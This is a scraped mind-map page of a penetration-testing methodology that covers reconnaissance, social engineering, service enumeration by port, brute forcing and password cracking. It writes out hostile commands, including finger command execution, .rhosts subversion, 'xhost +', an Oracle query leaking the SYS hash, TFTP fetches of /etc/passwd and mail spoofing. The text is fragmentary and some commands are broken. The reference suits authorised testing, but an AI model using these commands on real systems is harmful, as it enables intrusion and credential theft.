Penetration Testing Framework 0.58

Iniziamo. È gratuito!
o registrati con il tuo indirizzo email
Penetration Testing Framework 0.58 da Mind Map: Penetration Testing Framework 0.58

1. X11 port 6000^ open

1.1. X11 Enumeration

1.1.1. List open windows

1.1.2. Authentication Method Xauth Xhost

1.2. X11 Exploitation

1.2.1. xwd xwd -display -root -out

1.2.2. Keystrokes Received Transmitted

1.2.3. Screenshots

1.2.4. xhost +

1.3. Examine Configuration Files

1.3.1. /etc/Xn.hosts

1.3.2. /usr/lib/X11/xdm Untitled

1.3.3. /usr/lib/X11/xdm/xsession

1.3.4. /usr/lib/X11/xdm/xsession-remote

1.3.5. /usr/lib/X11/xdm/xsession.0

1.3.6. /usr/lib/X11/xdm/xdm-config DisplayManager*authorize:on

2. pwdump [-h][-o][-u][-p] machineName

3. Nabil contributed the AS/400 section.

4. Client Side Security

5. Back end files

5.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

6. Set objShell = CreateObject("WScript.Shell")

7. Check visible areas for sensitive information.

8. InitialProgram=c:\windows\system32\cmd.exe

9. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt


11. Pre-Inspection Visit - template

12. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.

12.1. Untitled

12.1.1. Authoratitive Bodies IANA - Internet Assigned Numbers Authority ICANN - Internet Corporation for Assigned Names and Numbers. NRO - Number Resource Organisation RIR - Regional Internet Registry AFRINIC - African Network Information Centre APNIC - Asia Pacific Network Information Centre ARIN - American Registry for Internet Numbers LACNIC - Latin America & Caribbean Network Information Centre RIPE - Reseaux IP Européens—Network Coordination Centre

12.1.2. Websites Central Ops Domain Dossier Email Dossier DNS Stuff Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries. Fixed Orbit Autonomous System lookups and other online tools available. Geektools IP2Location Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information. Kartoo Metasearch engine that visually presents its results. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution Excellent site that can be used if the above is down Netcraft Online search tool allowing queries for host information. Passive DNS Replication Finds shared domains based on supplied IP addresses Note: - Website utilised by nmap hostmap.nse script Robtex Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed. Note: - Can be unreliable with old entries (Use CentralOps to verify) Website listing a large number links to online traceroute resources. Wayback Machine Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.

12.1.3. Tools Cheops-ng Country whois Domain Research Tool Firefox Plugins AS Number Shazou Firecat Suite Gnetutil Goolag Scanner Greenwich Maltego GTWhois Sam Spade Smart whois SpiderFoot

12.2. Internet Search

12.2.1. General Information Web Investigator Tracesmart Friends Reunited Ebay - profiles etc.

12.2.2. Financial EDGAR - Company information, including real-time filings. US Google Finance - General Finance Portal Hoovers - Business Intelligence, Insight and Results. US and UK Companies House UK Land Registry UK

12.2.3. Phone book/ Electoral Role Information 123people Electoral Role Search. UK 411 Online White Pages and Yellow Pages. US Untitled Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US UK Residential Business Pipl Untitled Spokeo Yasni Zabasearch People Search Engine. US

12.2.4. Generic Web Searching Code Search Forum Entries Google Hacking Database Google Email Addresses Contact Details Newsgroups/forums Blog Search Yammer Google Blog Search Technorati Jaiku Twitter Network Browser Search Engine Comparison/ Aggregator Sites Clusty Grokker Zuula Exalead Delicious

12.2.5. Metadata Search Untitled MetaData Visualisation Sites Tools Wikipedia Metadata Search

12.2.6. Social/ Business Networks Untitled Africa Australia Belgium Holland Hungary Iran Japan Korea Poland Russia Sweden UK US Assorted

12.2.7. Resources OSINT International Directory of Search Engines

12.3. DNS Record Retrieval from publically available servers

12.3.1. Types of Information Records SOA Records - Indicates the server that has authority for the domain. MX Records - List of a host’s or domain’s mail exchanger server(s). NS Records - List of a host’s or domain’s name server(s). A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS. PTR Records - Lists a host’s domain name, host identified by its IP address. SRV Records - Service location record. HINFO Records - Host information record with CPU type and operating system. TXT Records - Generic text record. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer. RP - Responsible person for the domain.

12.3.2. Database Settings Version.bind Serial Refresh Retry Expiry Minimum

12.3.3. Sub Domains

12.3.4. Internal IP ranges Reverse DNS for IP Range

12.3.5. Zone Transfer

12.4. Social Engineering

12.4.1. Remote Phone Scenarios Results Contact Details Email Scenarios Software Results Contact Details Other

12.4.2. Local Personas Name Phone Email Business Cards Contact Details Name Phone number Email Room number Department Role Scenarios New IT employee Fire Inspector Results Maps Satalitte Imagery Building layouts Other

12.5. Dumpster Diving

12.5.1. Rubbish Bins

12.5.2. Contract Waste Removal

12.5.3. Ebay ex-stock sales i.e. HDD

12.6. Web Site copy

12.6.1. htttrack

12.6.2. teleport pro

12.6.3. Black Widow

13. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.

13.1. Default Port Lists

13.1.1. Windows

13.1.2. *nix

13.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific

13.2.1. General Enumeration Tools nmap nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results nmap -A -sS -PN -n --script:all ip_address --reason grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list netcat nc -v -n IP_Address port nc -v -w 2 -z IP_Address port_range/port_number amap amap -bqv 80 amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...] xprobe2 xprobe2 sinfp ./ -i -p nbtscan nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>) hping hping ip_address scanrand scanrand ip_address:all unicornscan unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E netenum netenum network/netmask timeout fping fping -a -d hostname/ (Network/Subnet_Mask)

13.2.2. Firewall Specific Tools firewalk firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP] ftester host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log

13.2.3. Default Passwords (Examine list) Passwords A Passwords B Passwords C Passwords D Passwords E Passwords F Passwords G Passwords H Passwords I Passwords J Passwords K Passwords L Passwords M Passwords N Passwords O Passwords P Passwords R Passwords S Passwords T Passwords U Passwords V Passwords W Passwords X Passwords Y Passwords Z Passwords (Numeric)

13.3. Active Hosts

13.3.1. Open TCP Ports

13.3.2. Closed TCP Ports

13.3.3. Open UDP Ports

13.3.4. Closed UDP Ports

13.3.5. Service Probing SMTP Mail Bouncing Banner Grabbing Other HTTP HTTPS SMTP POP3 FTP

13.3.6. ICMP Responses Type 3 (Port Unreachable) Type 8 (Echo Request) Type 13 (Timestamp Request) Type 15 (Information Request) Type 17 (Subnet Address Mask Request) Responses from broadcast address

13.3.7. Source Port Scans TCP/UDP 53 (DNS) TCP 20 (FTP Data) TCP 80 (HTTP) TCP/UDP 88 (Kerberos)

13.3.8. Firewall Assessment Firewalk TCP/UDP/ICMP responses

13.3.9. OS Fingerprint

14. Enumeration

14.1. Daytime port 13 open

14.1.1. nmap nse script daytime

14.2. FTP port 21 open

14.2.1. Fingerprint server telnet ip_address 21 (Banner grab) Run command ftp ip_address [email protected] Check for anonymous access ftp ip_addressUsername: anonymous OR anonPassword: [email protected]

14.2.2. Password guessing Hydra brute force medusa Brutus

14.2.3. Examine configuration files ftpusers ftp.conf proftpd.conf

14.2.4. MiTM

14.3. SSH port 22 open

14.3.1. Fingerprint server telnet ip_address 22 (banner grab) scanssh scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

14.3.2. Password guessing ssh [email protected]_address guess-who ./b -l username -h ip_address -p 22 -2 < password_file_location Hydra brute force brutessh Ruby SSH Bruteforcer

14.3.3. Examine configuration files ssh_config sshd_config authorized_keys ssh_known_hosts .shosts

14.3.4. SSH Client programs tunnelier winsshd putty winscp

14.4. Telnet port 23 open

14.4.1. Fingerprint server telnet ip_address Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster telnetfp

14.4.2. Password Attack Untitled Hydra brute force Brutus telnet -l "-froot" hostname (Solaris 10+)

14.4.3. Examine configuration files /etc/inetd.conf /etc/xinetd.d/telnet /etc/xinetd.d/stelnet

14.5. Sendmail Port 25 open

14.5.1. Fingerprint server telnet ip_address 25 (banner grab)

14.5.2. Mail Server Testing Enumerate users VRFY username (verifies if username exists - enumeration of accounts) EXPN username (verifies if username is valid - enumeration of accounts) Mail Spoof Test HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT Mail Relay Test Untitled

14.5.3. Examine Configuration Files

14.6. DNS port 53 open

14.6.1. Fingerprint server/ service host host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename. nslookup nslookup [ -option ... ] [ host-to-find | - [ server ]] dig dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ] whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup

14.6.2. DNS Enumeration Bile Suite perl [website] [project_name] perl [website] [input file] perl [input file] [true domain file] [output file] <range> perl [input file] [true domain file] [output file] perl [input file] [output file] perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names] perl [ip_address_file] [output_file] perl jarf-rev [subnetblock] [nameserver] txdns txdns -rt -t domain_name txdns -x 50 -bb domain_name nmap nse scripts dns-random-srcport dns-random-txid dns-recursion dns-zone-transfer

14.6.3. Examine Configuration Files host.conf resolv.conf named.conf

14.7. TFTP port 69 open

14.7.1. TFTP Enumeration tftp ip_address PUT local_file tftp ip_address GET conf.txt (or other files) Solarwinds TFTP server tftp – i <IP> GET /etc/passwd (old Solaris)

14.7.2. TFTP Bruteforcing TFTP bruteforcer Cisco-Torch

14.8. Finger Port 79 open

14.8.1. User enumeration finger 'a b c d e f g h' finger [email protected] finger [email protected] finger [email protected] finger [email protected] finger ** finger [email protected] finger nmap nse script finger

14.8.2. Command execution finger "|/bin/[email protected]" finger "|/bin/ls -a /"

14.8.3. Finger Bounce finger [email protected]@victim finger @[email protected]

14.9. Web Ports 80,8080 etc. open

14.9.1. Fingerprint server Telnet ip_address port Firefox plugins All Specific

14.9.2. Crawl website lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source httprint Metagoofil -d [domain] -l [no. of] -f [type] -o results.html

14.9.3. Web Directory enumeration Nikto nikto [-h target] [options] DirBuster Wikto Goolag Scanner

14.9.4. Vulnerability Assessment Manual Tests Default Passwords Install Backdoors Method Testing Upload Files View Page Source Input Validation Checks Automated table and column iteration Vulnerability Scanners Acunetix Grendelscan NStealth Obiwan III w3af Specific Applications/ Server Tools Domino Joomla Vbulletin ZyXel

14.9.5. Proxy Testing Burpsuite Crowbar Interceptor Paros Requester Raw Suru WebScarab

14.9.6. Examine configuration files Generic Examine httpd.conf/ windows config files JBoss JMX Console http://<IP>:8080/jmxconcole/ Joomla configuration.php diagnostics.php Mambo configuration.php Wordpress setup-config.php wp-config.php ZyXel /WAN.html (contains PPPoE ISP password) /WLAN_General.html and /WLAN.html (contains WEP key) /rpDyDNS.html (contains DDNS credentials) /Firewall_DefPolicy.html (Firewall) /CF_Keyword.html (Content Filter) /RemMagWWW.html (Remote MGMT) /rpSysAdmin.html (System) /LAN_IP.html (LAN) /NAT_General.html (NAT) /ViewLog.html (Logs) /rpFWUpload.html (Tools) /DiagGeneral.html (Diagnostic) /RemMagSNMP.html (SNMP Passwords) /LAN_ClientList.html (Current DHCP Leases) Config Backups

14.9.7. Examine web server logs c:\winnt\system32\Logfiles\W3SVC1 awk -F " " '{print $3,$11} filename | sort | uniq

14.9.8. References White Papers Cross Site Request Forgery: An Introduction to a Common Web Application Weakness Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity Blind Security Testing - An Evolutionary Approach Command Injection in XML Signatures and Encryption Input Validation Cheat Sheet SQL Injection Cheat Sheet Books Hacking Exposed Web 2.0 Hacking Exposed Web Applications The Web Application Hacker's Handbook

14.9.9. Exploit Frameworks Brute-force Tools Acunetix Metasploit w3af

14.10. Portmapper port 111 open

14.10.1. username:[email protected]_Address port/protocol (i.e. 80/HTTP)

14.10.2. rpcinfo rpcinfo [options] IP_Address

14.11. NTP Port 123 open

14.11.1. NTP Enumeration ntpdc -c monlist IP_ADDRESS ntpdc -c sysinfo IP_ADDRESS ntpq host hostname ntpversion readlist version

14.11.2. Examine configuration files ntp.conf

14.11.3. nmap nse script ntp-info

14.12. NetBIOS Ports 135-139,445 open

14.12.1. NetBIOS enumeration Enum enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip> Null Session net use \\\ipc$ "" /u:"" Smbclient smbclient -L //server/share password options Superscan Enumeration tab. user2sid/sid2user Winfo

14.12.2. NetBIOS brute force Hydra Brutus Cain & Abel getacct NAT (NetBIOS Auditing Tool)

14.12.3. Examine Configuration Files Smb.conf lmhosts

14.13. SNMP port 161 open

14.13.1. Default Community Strings public private cisco cable-docsis ILMI

14.13.2. MIB enumeration Windows NT . Hostnames . Domain Name . Usernames . Running Services . Share Information Solarwinds MIB walk Getif snmpwalk snmpwalk -v <Version> -c <Community string> <IP> Snscan Applications ZyXel nmap nse script snmp-sysdescr

14.13.3. SNMP Bruteforce onesixtyone onesixytone -c SNMP.wordlist <IP> cat ./cat -h <IP> -w SNMP.wordlist Solarwinds SNMP Brute Force ADMsnmp nmap nse script snmp-brute

14.13.4. Examine SNMP Configuration files snmp.conf snmpd.conf snmp-config.xml

14.14. LDAP Port 389 Open

14.14.1. ldap enumeration ldapminer ldapminer -h ip_address -p port (not required if default) -d luma Gui based tool ldp Gui based tool openldap ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...] ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file] ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn] ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file] ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

14.14.2. ldap brute force bf_ldap bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,) K0ldS

14.14.3. Examine Configuration Files General containers.ldif ldap.cfg ldap.conf ldap.xml ldap-config.xml ldap-realm.xml slapd.conf IBM SecureWay V3 server Microsoft Active Directory server msadClassesAttrs.ldif Netscape Directory Server 4 nsslapd.sas_at.conf nsslapd.sas_oc.conf OpenLDAP directory server slapd.sas_at.conf slapd.sas_oc.conf Sun ONE Directory Server 5.1 75sas.ldif

14.15. PPTP/L2TP/VPN port 500/1723 open

14.15.1. Enumeration ike-scan ike-probe

14.15.2. Brute-Force ike-crack

14.15.3. Reference Material PSK cracking paper SecurityFocus Infocus Scanning a VPN Implementation

14.16. Modbus port 502 open

14.16.1. modscan

14.17. rlogin port 513 open

14.17.1. Rlogin Enumeration Find the files find / -name .rhosts locate .rhosts Examine Files cat .rhosts Manual Login rlogin hostname -l username rlogin <IP> Subvert the files echo ++ > .rhosts

14.17.2. Rlogin Brute force Hydra

14.18. rsh port 514 open

14.18.1. Rsh Enumeration rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

14.18.2. Rsh Brute Force rsh-grind Hydra medusa

14.19. SQL Server Port 1433 1434 open

14.19.1. SQL Enumeration piggy SQLPing sqlping ip_address/hostname SQLPing2 SQLPing3 SQLpoke SQL Recon SQLver

14.19.2. SQL Brute Force SQLPAT sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack sqlbf -u hashes.txt -c -r out.rep - Brute-Force Attack SQL Dict SQLAT Hydra SQLlhf ForceSQL

14.20. Citrix port 1494 open

14.20.1. Citrix Enumeration Default Domain Published Applications ./citrix-pa-scan {IP_address/file | - | random} [timeout] IP_to_proxy_to [Local_IP]

14.20.2. Citrix Brute Force bforce.js connect.js Citrix Brute-forcer Reference Material Hacking Citrix - the legitimate backdoor Hacking Citrix - the forceful way

14.21. Oracle Port 1521 Open

14.21.1. Oracle Enumeration oracsec Repscan Sidguess Scuba DNS/HTTP Enumeration SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'') FROM DUAL Untitled WinSID Oracle default password list TNSVer tnsver host [port] TCP Scan Oracle TNSLSNR Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop] TNSCmd perl -h ip_address perl version -h ip_address perl status -h ip_address perl -h ip_address --cmdsize (40 - 200) LSNrCheck Oracle Security Check (needs credentials) OAT sh -s ip_address opwg.bat -s ip_address sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID OScanner sh -s ip_address oscanner.exe -s ip_address sh oscanner_saved_file.xml reportviewer.exe oscanner_saved_file.xml NGS Squirrel for Oracle Service Register Service-register.exe ip_address PLSQL Scanner 2008

14.21.2. Oracle Brute Force OAK ora-getsid hostname port sid_dictionary_list ora-auth-alter-session host port sid username password sql ora-brutesid host port start ora-pwdbrute host port sid username password-file ora-userenum host port sid userlistfile ora-ver -e (-f -l -a) host port breakable (Targets Application Server Port) breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose SQLInjector (Targets Application Server Port) sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle Check Password orabf orabf [hash]:[username] [options] thc-orakel Cracker Client Crypto DBVisualisor Sql scripts from Manual sql input of previously reported vulnerabilties

14.21.3. Oracle Reference Material Understanding SQL Injection SQL Injection walkthrough SQL Injection by example Advanced SQL Injection in Oracle databases Blind SQL Injection SQL Cheatsheets Untitled

14.22. NFS Port 2049 open

14.22.1. NFS Enumeration showmount -e hostname/ip_address mount -t nfs ip_address:/directory_found_exported /local_mount_point

14.22.2. NFS Brute Force Interact with NFS share and try to add/delete Exploit and Confuse Unix

14.22.3. Examine Configuration Files /etc/exports /etc/lib/nfs/xtab

14.22.4. nmap nse script nfs-showmount

14.23. Compaq/HP Insight Manager Port 2301,2381open

14.23.1. HP Enumeration Authentication Method Host OS Authentication Default Authentication Wikto Nstealth

14.23.2. HP Bruteforce Hydra Acunetix

14.23.3. Examine Configuration Files mx.log CLIClientConfig.cfg database.props pg_hba.conf jboss-service.xml .namazurc

14.24. MySQL port 3306 open

14.24.1. Enumeration nmap -A -n -p3306 <IP Address> nmap -A -n -PN --script:ALL -p3306 <IP Address> telnet IP_Address 3306 use test; select * from test; To check for other DB's -- show databases

14.24.2. Administration MySQL Network Scanner MySQL GUI Tools mysqlshow mysqlbinlog

14.24.3. Manual Checks Default usernames and passwords username: root password: testing Configuration Files Operating System Command History Log Files To run many sql commands at once -- mysql -u username -p < manycommands.sql MySQL data directory (Location specified in my.cnf) SSL Check Privilege Escalation Current Level of access Access passwords Create a new user and grant him privileges Break into a shell

14.24.4. SQL injection http://target/ expected_string database

14.24.5. References. Design Weaknesses MySQL running as root Exposed publicly on Internet

14.25. RDesktop port 3389 open

14.25.1. Rdesktop Enumeration Remote Desktop Connection

14.25.2. Rdestop Bruteforce TSGrinder tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address Tscrack

14.26. Sybase Port 5000+ open

14.26.1. Sybase Enumeration sybase-version ip_address from NGS

14.26.2. Sybase Vulnerability Assessment Use DBVisualiser Sybase Security checksheet Manual sql input of previously reported vulnerabilties NGS Squirrel for Sybase

14.27. SIP Port 5060 open

14.27.1. SIP Enumeration netcat nc IP_Address Port sipflanker python 192.168.1-254 Sipscan smap smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Address

14.27.2. SIP Packet Crafting etc. sipsak Tracing paths: - sipsak -T -s sip:[email protected] Options request:- sipsak -vv -s sip:[email protected] Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected] siprogue

14.27.3. SIP Vulnerability Scanning/ Brute Force tftp bruteforcer Default dictionary file ./ IP_Address Dictionary_file Maximum_Processes VoIPaudit SiVuS

14.27.4. Examine Configuration Files SIPDefault.cnf asterisk.conf sip.conf phone.conf sip_notify.conf <Ethernet address>.cfg 000000000000.cfg phone1.cfg sip.cfg etc. etc.

14.28. VNC port 5900^ open

14.28.1. VNC Enumeration Scans 5900^ for direct access.5800 for HTTP access.

14.28.2. VNC Brute Force Password Attacks Remote Local

14.28.3. Exmine Configuration Files .vnc /etc/vnc/config $HOME/.vnc/config /etc/sysconfig/vncservers /etc/vnc.conf

14.29. Tor Port 9001, 9030 open

14.29.1. Tor Node Checker Ip Pages

14.29.2. nmap NSE script

14.30. Jet Direct 9100 open

14.30.1. hijetta

15. Password cracking

15.1. Rainbow crack

15.1.1. ophcrack

15.1.2. rainbow tables rcrack c:\rainbowcrack\*.rt -f pwfile.txt

15.2. Ophcrack

15.3. Cain & Abel

15.4. John the Ripper

15.4.1. ./unshadow passwd shadow > file_to_crack

15.4.2. ./john -single file_to_crack

15.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

15.4.4. ./john -show file_to_crack

15.4.5. ./john --incremental:All file_to_crack

15.5. fgdump

15.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

15.6. pwdump6

15.7. medusa

15.8. LCP

15.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada

15.9.1. Domain credentials

15.9.2. Sniffing

15.9.3. pwdump import

15.9.4. sam import

15.10. aiocracker

15.10.1. [md5, sha1, sha256, sha384, sha512] hash dictionary_list

16. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.

16.1. Manual

16.1.1. Patch Levels

16.1.2. Confirmed Vulnerabilities Severe High Medium Low

16.2. Automated

16.2.1. Reports

16.2.2. Vulnerabilities Severe High Medium Low

16.3. Tools

16.3.1. GFI

16.3.2. Nessus (Linux) Nessus (Windows)

16.3.3. NGS Typhon

16.3.4. NGS Squirrel for Oracle

16.3.5. NGS Squirrel for SQL

16.3.6. SARA

16.3.7. MatriXay

16.3.8. BiDiBlah

16.3.9. SSA

16.3.10. Oval Interpreter

16.3.11. Xscan

16.3.12. Security Manager +

16.3.13. Inguma

16.4. Resources

16.4.1. Security Focus

16.4.2. Microsoft Security Bulletin

16.4.3. Common Vulnerabilities and Exploits (CVE)

16.4.4. National Vulnerability Database (NVD)

16.4.5. The Open Source Vulnerability Database (OSVDB) Standalone Database Update URL

16.4.6. United States Computer Emergency Response Team (US-CERT)

16.4.7. Computer Emergency Response Team

16.4.8. Mozilla Security Information

16.4.9. SANS

16.4.10. Securiteam

16.4.11. PacketStorm Security

16.4.12. Security Tracker

16.4.13. Secunia


16.4.15. ntbugtraq

16.4.16. Wireless Vulnerabilities and Exploits (WVE)

16.5. Blogs

16.5.1. Carnal0wnage

16.5.2. Fsecure Blog

16.5.3. g0ne blog

16.5.4. GNUCitizen

16.5.5. ha.ckers Blog

16.5.6. Jeremiah Grossman Blog

16.5.7. Metasploit

16.5.8. nCircle Blogs

16.5.9. pentest

16.5.10. Rational Security

16.5.11. Rational Security

16.5.12. Rise Security

16.5.13. Security Fix Blog

16.5.14. Software Vulnerability Exploitation Blog

16.5.15. Software Vulnerability Exploitation Blog

16.5.16. Taosecurity Blog

17. AS/400 Auditing

17.1. Remote

17.1.1. Information Gathering Nmap using common iSeries (AS/400) services. Unsecured services (Port;name;description) Secured services (Port;name;description) NetCat (old school technique) nc -v -z -w target ListOfServices.txt | grep "open" Banners Grabbing Telnet FTP HTTP Banner POP3 SNMP SMTP

17.1.2. Users Enumeration Default AS/400 users accounts Error messages Telnet Login errors POP3 authentication Errors Qsys symbolic link (if ftp is enabled) ftp target | quote stat | quote site namefmt 1 cd / quote site listfmt 1 mkdir temp quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys') quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys') dir /temp/qsys/*.usrprf LDAP Need os400-sys value from ibm-slapdSuffix Tool to browse LDAP

